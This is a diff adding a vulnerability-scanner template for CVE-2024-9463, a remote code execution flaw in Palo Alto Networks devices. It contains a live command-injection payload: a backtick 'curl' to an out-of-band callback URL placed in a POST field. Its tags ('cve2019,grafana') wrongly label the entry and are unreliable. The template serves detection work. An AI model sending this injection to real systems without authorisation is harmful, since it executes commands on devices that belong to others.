Create CVE-2024-9463.yaml

http/cves/2024/CVE-2024-9463.yaml

@@ -0,0 +1,32 @@
+id: CVE-2024-9463
+
+info:
+  name: Palo Alto Networks - RCE
+  author: princechaddha
+  severity: critical
+  description: |
+    Palo Alto Networks devices are vulnerable to Remote Code Execution (RCE) via CVE-2024-9463.
+  impact: |
+    Successful exploitation could result in unauthorized access and control of the affected device.
+  remediation: |
+    Apply the necessary security patches provided by Palo Alto Networks to mitigate the CVE-2024-9463 vulnerability.
+  reference: |-
+    - https://x.com/watchtowrcyber/status/1844306954245767623
+    - https://security.paloaltonetworks.com/PAN-SA-2024-0010
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+  tags: cve,cve2019,grafana
+
+http:
+  - raw:
+      - |
+        POST /API/convertCSVtoParquet.php HTTP/1.1         
+        Host: {{Hostname}}  
+        Content-Type: application/x-www-form-urlencoded        
+
+        ram=watchTowr`curl+{{interactsh-url}}`
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"